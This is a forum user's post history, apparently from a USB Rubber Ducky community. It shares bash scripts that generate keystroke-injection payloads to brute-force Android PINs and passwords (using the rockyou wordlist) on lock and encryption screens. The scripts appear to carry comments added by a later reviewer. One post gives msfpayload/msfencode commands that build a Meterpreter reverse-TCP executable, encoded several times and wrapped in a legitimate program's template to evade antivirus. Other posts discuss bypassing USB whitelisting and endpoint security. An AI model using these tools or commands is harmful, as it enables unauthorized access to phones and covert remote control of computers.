Posts posted by CaptainHooligan

  1. Awesome work! I started a project exactly like this a couple of months ago, but work struck and I haven't had time to maintain it. Below is the code for the pseudo-framework shell script I wrote. Maybe you can fold it into your setup to add graphical menus with the dialog commands I used. You could also use zenity.

    #!/bin/bash
    #
    # Payload-Generator version 1.0
    # This tool is licensed under the GPLv3. Currently maintained by
    # James Luther (CaptainHooligan)
    #
    # This tool is used to generate payloads for the USB Rubber Ducky
    #
    # ========================================================================
    # Main Menu
    # ========================================================================
    
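    main ()
    {
      # Top-level menu.  dialog --menu prints the selected tag to stderr, so
      # the selection is captured through a private temp file and dispatched
      # to the Pin/Password sub-menus, the About box, or Exit.
      # Globals: opt (written) -- dialog's exit status, kept because the
      #          original assigned it as a global too.
      # Returns: 0 (1 only if no temp file could be created).
      local menufile menuitem
      # mktemp rather than /tmp/menuitem.$$: the script runs as root and a
      # predictable name in a world-writable directory can be pre-created by
      # another local user (the selection would be written through it).
      menufile=$(mktemp) || { echo "mktemp failed" >&2; return 1; }
      dialog --backtitle "Ducky Payload Generator" --title "Main Menu" --menu "Make a selection using [UP], [DOWN], and use [ENTER] to select." 15 45 4 Password "Brute Force Password" Pin "Brute Force Pin" About  "Display About" Exit "Quit " 2>"$menufile"
      # Read $? immediately: the original assigned opt=$? after `cat`, so it
      # always held cat's status rather than dialog's (0 OK, 1 Cancel, 255 ESC).
      opt=$?
      menuitem=$(cat -- "$menufile")
      rm -f -- "$menufile"
      if [ "$opt" -ne 0 ]; then
        # Cancel/ESC leaves the selection empty; same outcome as the default arm.
        clear
        return
      fi
      case "$menuitem" in
      Pin) Pin;;
      Password) Password;;
      About) dialog --backtitle "Ducky Payload Generator" --title "About" --msgbox "\nThe Ducky Payload Generator is used to generate a number of payloads for the USB Rubber Ducky. As of right now it is just made to brute force Android passwords. Later pin brute forcing, reverse shell payloads, and whatever else we can think of will be added. Until then enjoy!\n\n Version: 1.0\n Licensed Under GPLv3\n Maintainted by CaptainHooligan" 15 70 && clear && main;;
      Exit) clear;;
      *) clear;;
      esac
      return
    }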
    # ==========================================================================
    # This is where the Encryption Brute Forcer is Generated
    # ==========================================================================
    Pin ()
    {
    # PIN sub-menu.  Each generator arm writes a Ducky script with one
    # "STRING nnnn" line per value of 0000..9999, each followed by
    # DELAY 1000/ENTER/ENTER (the Lock arm additionally expands every fifth
    # entry -- GNU sed "0~5" address -- into a longer DELAY/ENTER run),
    # encodes it with duckencode.jar from the current directory and renames
    # the resulting inject.bin.  "DELAY 5000" goes to a scratch file that is
    # removed at the end of the arm; the payload file itself is only ever
    # appended to (>>).
    # NOTE(review): /tmp/menuitem.$$ is a predictable name in a shared
    # directory and this script runs as root; a pre-created file or symlink
    # there would be written through.  mktemp avoids that.
    dialog --backtitle "Ducky Payload Generator" --title "Pin Brute Forcer" --menu "Make a selection using [UP], [DOWN], and use [ENTER] to select." 15 45 4 Encryption "Pin at Encryption Screen" Lock "Pin at Locked Screen" Main "Return to Main Menu" 2>/tmp/menuitem.$$
    
    # Selection tag, as written by dialog to its stderr.
    menuitem=`cat /tmp/menuitem.$$`
    
    # NOTE(review): this is cat's status, not dialog's, so Cancel/ESC cannot
    # be told apart from OK here; opt is not read anywhere visible.
    opt=$?
    
    # Unquoted on purpose in the original; the tag is one of the fixed words
    # above or empty on Cancel.
    case $menuitem in
    Encryption) clear && echo "Generating Encryption Screen Pin Brute Forcer Payload ..." && echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' >> android_brute-force_encryption.txt && java -jar duckencode.jar -i android_brute-force_encryption.txt && mv inject.bin android_brute-force_encryption.bin && rm android_brute-force_0000-9999.txt && ls -lart android_brute-force_encryption.*;; 
    Lock) clear && echo "Generating Lock Screen Pin Brute Forcer Payload ... " && echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_lock.txt && java -jar duckencode.jar -i android_brute-force_lock.txt && mv inject.bin android_brute-force_lock.bin && rm android_brute-force_0000-9999.txt && ls -lart android_brute-force_lock.*;;
    Main) clear && main;;
    *) clear ;;
    esac
    return
    }
    # =========================================================================
    # This is where the Password Brute Forcer Menu is processed.
    # =========================================================================
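    Password ()
    {
      # Password sub-menu: chooses between the encryption-screen and
      # lock-screen password generators, or returns to the main menu.
      # Globals: opt (written) -- dialog's exit status, as in the original.
      # Returns: 0 (1 only if no temp file could be created).
      local menufile menuitem
      # Private temp file instead of the predictable /tmp/menuitem.$$ (the
      # script runs as root; a pre-created file or symlink there would be
      # followed when dialog writes its selection).
      menufile=$(mktemp) || { echo "mktemp failed" >&2; return 1; }
      dialog --backtitle "Ducky Payload Generator" --title "Password Brute Forcer" --menu "Make a selection using [UP], [DOWN], and use [ENTER] to select." 15 45 4 Encryption "Password at Encryption Screen" Lock "Password at Locked Screen" Main "Return to Main Menu" 2>"$menufile"
      # Take dialog's status before anything else runs; the original read $?
      # after cat and therefore never saw Cancel (1) or ESC (255).
      opt=$?
      menuitem=$(cat -- "$menufile")
      rm -f -- "$menufile"
      if [ "$opt" -ne 0 ]; then
        clear
        return
      fi
      case "$menuitem" in
      Encryption) clear && Pword_Enc ;;
      Lock) clear && Pword_Lck ;;
      Main) clear && main ;;
      *) clear ;;
      esac
      return
    }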
    # ==========================================================================
    # Password Encryption Screen Brute Forcer
    # ==========================================================================
    Pword_Enc ()
    {
    # Writes a Ducky script from the first 5000 lines of ./rockyou.txt (one
    # "STRING <entry>" line each, followed by DELAY 1000/ENTER/ENTER), encodes
    # it with ./duckencode.jar and renames the resulting inject.bin.
    # NOTE(review): rockyou.txt and duckencode.jar are resolved relative to
    # the current directory, and none of head/java/mv is checked for failure;
    # if the wordlist is missing the file still gets encoded with only the
    # leading DELAY 5000 line.  The .txt is appended to (>>), not replaced.
    echo "Generating Encryption Screen Password Brute Forcer ..."
    echo " "
    echo DELAY 5000 > android-pword-encryption.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' >> android-pword-encryption.txt
    java -jar duckencode.jar -i android-pword-encryption.txt
    mv inject.bin android-pword-encryption.bin
    clear && ls -lart android-pword-encryption.*
    return
    }
    # ==========================================================================
    # Password Lock Screen Brute Forcer
    # ==========================================================================
    Pword_Lck ()
    {
    # Same as Pword_Enc, but every fifth entry (GNU sed "0~5" address) is
    # first tagged WAIT and then expanded by the last sed into the longer
    # DELAY 5000/ENTER run.  Output is android-pword-lock.{txt,bin}.
    # NOTE(review): as in Pword_Enc, inputs are taken from the current
    # directory, no command status is checked, and the .txt is appended to
    # rather than replaced.
    echo "Generating Lock Screen Password Brute Forcer ..."
    echo " "
    echo DELAY 5000 > android-pword-lock.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android-pword-lock.txt
    java -jar duckencode.jar -i android-pword-lock.txt
    mv inject.bin android-pword-lock.bin
    clear && ls -lart android-pword-lock.*
    return
    }
    # =====================================================================
    # Prerequisite Checker
    # =====================================================================
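    # Locate one prerequisite.  $1 = executable/file name, $2 = display name.
    # Prefers PATH (command -v); otherwise searches the filesystem for the
    # first matching regular file and appends its *directory* to PATH, which
    # is what the original intended (it appended find's raw output -- the
    # file path itself, possibly several matches on one line).  Exits 1 if
    # nothing is found, with the same message as the original.
    locate_prereq ()
    {
      local name=$1 label=$2 found
      if command -v "$name" >/dev/null 2>&1; then
        echo "$label prerequisite met."
        return 0
      fi
      # -print -quit stops at the first hit instead of sweeping every mount.
      found=$(find / -name "$name" -type f -print -quit 2>/dev/null)
      if [ -z "$found" ] ; then
        echo "$label not found on system. Please verify you have this installed."
        exit 1
      fi
      echo "$label prerequisite met."
      PATH=$PATH:${found%/*}
    }
    # =====================================================================
    # Prerequisite Checker: verifies duckencode.jar, bzip2 and wget, fetches
    # the rockyou wordlist, records $HOME/.payloadgenerator and enters main.
    # Globals: PATH (may be extended), HOME (read).
    # Returns: 0 after main returns; exits 1 on a missing prerequisite or a
    #          failed download/decompression.
    # =====================================================================
    pre ()
    {
      echo "Verifying prerequisites are installed ... "
      echo ""
      # NOTE(review): `java -jar duckencode.jar` in the generator functions
      # resolves the jar relative to the current directory, so the PATH entry
      # added here only matters if the script is run from that directory.
      locate_prereq duckencode.jar Duckencode.jar
      locate_prereq bzip2 Bzip2
      locate_prereq wget Wget
      echo ""
      echo ""
      echo "Verify connection to internet and press [Enter]."
      read -r _
      echo ""
      echo ""
      echo "Downloading rockyou password list. This can take some time ..."
      echo ""
      echo ""
      # NOTE(review): plain http and no checksum or signature check -- whatever
      # the server (or anyone on the path) returns is used as-is.  Pin the
      # expected digest here once known: <EXPECTED_SHA256 placeholder>.
      # The original ignored wget/bunzip2 failures and still wrote the
      # "prerequisites met" marker below.
      wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2 || { echo "Download failed." >&2; exit 1; }
      bunzip2 rockyou.txt.bz2 || { echo "Could not decompress rockyou.txt.bz2." >&2; exit 1; }
      echo ""
      echo 1 > "$HOME/.payloadgenerator"
      echo "All Prerequisites met. To continue press [Enter]."
      read -r _
      main
      return
    }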
    # ==========================================================================
    # Actual program running
    # ==========================================================================
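    clear
    echo " "
    # Root check via the effective uid instead of parsing `id` output.
    # NOTE(review): nothing in this script needs root apart from the original
    # `find /` sweeps; running the generator as an unprivileged user would be
    # the least-privilege choice.
    if [ "$(id -u)" != "0" ] ; then
      echo "Sorry, you need super user access to run this script."
      exit 1
    fi
    echo " "
    echo "Checking to see if you've met prerequisites before ..."
    echo " "
    # pre() writes the marker to $HOME/.payloadgenerator.  The original tested
    # /root/.payloadgenerator but read $HOME/.payloadgenerator; the two differ
    # whenever root's HOME is not /root (e.g. `su` without `-`, or sudo keeping
    # the caller's HOME), so use one path for both.
    marker="$HOME/.payloadgenerator"
    if [ -f "$marker" ]; then
      check=$(cat -- "$marker")
      case "$check" in
        1) main;;
        *) pre;;
      esac
    else
      pre
    fi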
    
  2. Not with version 2 firmware (normally whitelist is based off VID & PID), assuming you have a laptop you can re-write vidpid.bin to support the VID&PID of known device (obtainable from device manager on Win_X or lsusb (usbutils package)(or at least dev) on Unix).

    Bypass AV/HBSS for the win!

    Good call! As always the more research you do on a target the better prepared you can be.

  3. That was pretty much the point I was trying to make, there is always a way to get around what security implementations you run into. The duck does appear as a HID which means what user limits we run into are what we have to deal with. If the security implementation has application white listing the download will not matter as the .exe will not be allowed to run. Typically in a locked environment downloading is limited to power users or administrators.

    Either way, know the environment and plan accordingly as there is always a way when thinking outside the box.

  4. It doesn't really matter what the limitations are set to users. There will always be some way to bypass security in one way or another. For example: robust firewall solution combined with application white listing, limited permissions and USB mass storage disabled means you aren't going to be able to download a file nor will you be able to bring one in.

  5. This is a payload generator script. This is the first version and it currently only builds payloads to brute force android PINs and Passwords. Basically what it does is check to ensure prerequisites are met, then generates the payload selected. Right now it works and does what it says it's going to do. Enjoy and please send feedback on functions, etc.

    Since I'm not able to upload the scripts themselves and it is over 900 lines of code it is hosted on an external link. You can download here:

    https://docs.google.com/file/d/0B7P5FQhXHcvdeXZ1cDk3TUV2NFk/edit?usp=sharing

  6. Another good thing to do would be to download the rockyou password list from skullsecurity. Take the top 5000 out of it, as it is already sorted from most frequently used to least. If a device is encrypted this will save you tons of time, as there is no "5 passwords then wait" limiter.

    Here is a script that will grab rockyou.txt and create a payload for you on Linux. Right now it waits 30 seconds after every 5 passwords. I'm adding an option to not wait 30 seconds, for when attacking the encryption logon screen.

    #!/bin/bash
    # Flat script, no functions: prints a banner, insists on root, checks for
    # duckencode.jar/bzip2/wget, downloads the rockyou wordlist and turns its
    # first 5000 lines into a Ducky script (rock-android.txt), which is then
    # encoded to inject.bin by duckencode.jar in the current directory.
    clear
    echo -e "========================================================"
    echo -e " This script downloads the rockyou password list"
    echo -e " then takes the top 5000 passwords and generates"
    echo -e " an Android brute forcer."
    echo -e "========================================================"
    echo -e " You need to have duckencode.jar installed as well"
    echo -e " as bzip2 and wget."
    echo -e "========================================================"
    echo -e " This script is licensed under the GPLv3 and is"
    echo -e " currently maintained by James Luther (CaptainHooligan)"
    echo -e "========================================================"
    echo ""
    echo ""
    # Root check by parsing `id` output ("uid=0" before the first "(").
    # NOTE(review): nothing below needs root except the `find /` sweeps; a
    # least-privilege run would drop this and use `command -v` for the checks.
    WHOAMI=`id | sed -e 's/(.*//'`
    if [ "$WHOAMI" != "uid=0" ] ; then
         echo "Sorry, you need super user access to run this script."
         exit 1
    fi
    echo -e "Verifying prerequisites are installed ... "
    echo ""
    # Prerequisite checks.  NOTE(review): each `find /` walks the whole
    # filesystem and may return several paths on separate lines; the value
    # appended to PATH is the file path itself (not its directory), and
    # `which duckencode.jar` only succeeds if the jar is executable and on
    # PATH -- `java -jar duckencode.jar` below looks in the current directory
    # regardless of PATH.
    duckdir=`find / -name duckencode.jar`
    if [ -z "$duckdir" ] ; then
    echo "Duckencode.jar not found on system. Please verify you have this installed."
    exit 1
    else
    echo "Duckencode.jar prerequisite met."
    fi
    duckinpath=`which duckencode.jar`
    if [ -z "$duckinpath" ] ; then
    PATH=$PATH:$duckdir
    fi
    bundir=`find / -name bzip2`
    if [ -z "$bundir" ] ; then
    echo "Bzip2 not found on system. Please verify you have this installed."
    exit 1
    else
    echo "Bzip2 prerequisite met."
    fi
    buninpath=`which bzip2`
    if [ -z "$buninpath" ] ; then
    PATH=$PATH:$bundir
    fi
    wgetdir=`find / -name wget`
    if [ -z "$wgetdir" ] ; then
    echo "Wget not found on system. Please verify you have this installed."
    exit 1
    else
    echo "Wget prerequisite met."
    fi
    wgetinpath=`which wget`
    if [ -z "$wgetinpath" ] ; then
    PATH=$PATH:$wgetdir
    fi
    echo ""
    echo ""
    # Unfinished target-selection prompt, left commented out by the author.
    #echo -e "Which do you want to attack?"
    #echo -e " 1. Encryption Screen"
    #echo -e " 2. Password Screen"
    #read answer
    #case answer
    # 1)
    echo -e "Verify connection to internet and press [Enter]."
    read
    echo ""
    echo ""
    echo -e "Downloading rockyou password list. This can take some time ..."
    echo ""
    echo ""
    # NOTE(review): plain-http download with no integrity check; neither wget
    # nor the decompression step is checked for failure, so a missing or
    # partial wordlist is not detected here.  Both `read` prompts run without -r.
    wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2
    bunzip rockyou.txt.bz2
    echo ""
    echo ""
    echo -e "Creating rock-android.txt file ... "
    echo ""
    echo ""
    # One "STRING <entry>" line per wordlist entry, each followed by DELAY 1000
    # and two ENTERs; the GNU sed "0~5" address tags every fifth entry with
    # WAIT, which the last sed expands into the longer DELAY/ENTER sequence.
    # The file is appended to (>>) after the initial DELAY 5000 line.
    echo DELAY 5000 > rock-android.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> rock-android.txt
    echo -e "rock-android.txt created!"
    ls -lart rock-android.txt
    echo ""
    echo ""
    echo -e "Creating inject.bin file ... "
    # duckencode.jar is resolved from the current directory; its status is
    # not checked before the success message is printed.
    java -jar duckencode.jar -i rock-android.txt
    echo ""
    echo ""
    echo -e "Inject.bin created. Copy this over to your sdcard and enjoy!"
    ls -lart inject.bin
    
  7. I've never had an issue when obfuscating code with msfencode. I just use two or three passes and use at least two encoders. For example:


    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/coundown -c 5 -t exe payload.exe

    That sometimes still gets caught which is when I use a custom template which isn't too hard to do. Any windows executable can be used as a template. ProcessExplorer is an easy one to get your hands on and systinternals has a free download. All you need to do to run that is:

    wget http://download.sysinternals.com/Files/ProcessExplorer.zip
    unzip ProcessExplorer.zip
    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -t exe -x procexp.exe (This is the ProcessExplorer executable from zip) -o payload.exe -e x86/shikata_ga_nai -c 5

    As was mentioned in previous posts msfvenom is more updated than msfencode but when using a custom template (any windows executable) usually there is no problem at all bypassing AV.

  8. Another good thing to do would be to download the rockyou password list from skullsecurity. Take like the top 5000 out of it as it is already sorted by most frequently used to least. If a device is encrypted this will save you tons of time as there is no 5 password then wait limiter.

    ** Edit **

    Here is a script that will grab rockyou.txt and create a payload for you in linux. Right now it does wait 30 seconds after every 5 passwords. I'm adding an option to not wait 30 seconds as if attacking the encryption logon screen.


    #!/bin/bash
    # Flat script, no functions (same script as in post 6 above): prints a
    # banner, insists on root, checks for duckencode.jar/bzip2/wget, downloads
    # the rockyou wordlist and turns its first 5000 lines into a Ducky script
    # (rock-android.txt), which duckencode.jar in the current directory then
    # encodes to inject.bin.
    clear
    echo -e "========================================================"
    echo -e " This script downloads the rockyou password list"
    echo -e " then takes the top 5000 passwords and generates"
    echo -e " an Android brute forcer."
    echo -e "========================================================"
    echo -e " You need to have duckencode.jar installed as well"
    echo -e " as bzip2 and wget."
    echo -e "========================================================"
    echo -e " This script is licensed under the GPLv3 and is"
    echo -e " currently maintained by James Luther (CaptainHooligan)"
    echo -e "========================================================"
    echo ""
    echo ""
    # Root check by parsing `id` output ("uid=0" before the first "(").
    # NOTE(review): nothing below needs root except the `find /` sweeps; a
    # least-privilege run would drop this and use `command -v` for the checks.
    WHOAMI=`id | sed -e 's/(.*//'`
    if [ "$WHOAMI" != "uid=0" ] ; then
    echo "Sorry, you need super user access to run this script."
    exit 1
    fi
    echo -e "Verifying prerequisites are installed ... "
    echo ""
    # Prerequisite checks.  NOTE(review): each `find /` walks the whole
    # filesystem and may return several paths on separate lines; the value
    # appended to PATH is the file path itself (not its directory), and
    # `which duckencode.jar` only succeeds if the jar is executable and on
    # PATH -- `java -jar duckencode.jar` below looks in the current directory
    # regardless of PATH.
    duckdir=`find / -name duckencode.jar`
    if [ -z "$duckdir" ] ; then
    echo "Duckencode.jar not found on system. Please verify you have this installed."
    exit 1
    else
    echo "Duckencode.jar prerequisite met."
    fi
    duckinpath=`which duckencode.jar`
    if [ -z "$duckinpath" ] ; then
    PATH=$PATH:$duckdir
    fi
    bundir=`find / -name bzip2`
    if [ -z "$bundir" ] ; then
    echo "Bzip2 not found on system. Please verify you have this installed."
    exit 1
    else
    echo "Bzip2 prerequisite met."
    fi
    buninpath=`which bzip2`
    if [ -z "$buninpath" ] ; then
    PATH=$PATH:$bundir
    fi
    wgetdir=`find / -name wget`
    if [ -z "$wgetdir" ] ; then
    echo "Wget not found on system. Please verify you have this installed."
    exit 1
    else
    echo "Wget prerequisite met."
    fi
    wgetinpath=`which wget`
    if [ -z "$wgetinpath" ] ; then
    PATH=$PATH:$wgetdir
    fi
    echo ""
    echo ""
    # Unfinished target-selection prompt, left commented out by the author.
    #echo -e "Which do you want to attack?"
    #echo -e " 1. Encryption Screen"
    #echo -e " 2. Password Screen"
    #read answer
    #case answer
    # 1)
    echo -e "Verify connection to internet and press [Enter]."
    read
    echo ""
    echo ""
    echo -e "Downloading rockyou password list. This can take some time ..."
    echo ""
    echo ""
    # NOTE(review): plain-http download with no integrity check; neither wget
    # nor the decompression step is checked for failure, so a missing or
    # partial wordlist is not detected here.  Both `read` prompts run without -r.
    wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2
    bunzip rockyou.txt.bz2
    echo ""
    echo ""
    echo -e "Creating rock-android.txt file ... "
    echo ""
    echo ""
    # One "STRING <entry>" line per wordlist entry, each followed by DELAY 1000
    # and two ENTERs; the GNU sed "0~5" address tags every fifth entry with
    # WAIT, which the last sed expands into the longer DELAY/ENTER sequence.
    # The file is appended to (>>) after the initial DELAY 5000 line.
    echo DELAY 5000 > rock-android.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> rock-android.txt
    echo -e "rock-android.txt created!"
    ls -lart rock-android.txt
    echo ""
    echo ""
    echo -e "Creating inject.bin file ... "
    # duckencode.jar is resolved from the current directory; its status is
    # not checked before the success message is printed.
    java -jar duckencode.jar -i rock-android.txt
    echo ""
    echo ""
    echo -e "Inject.bin created. Copy this over to your sdcard and enjoy!"
    ls -lart inject.bin
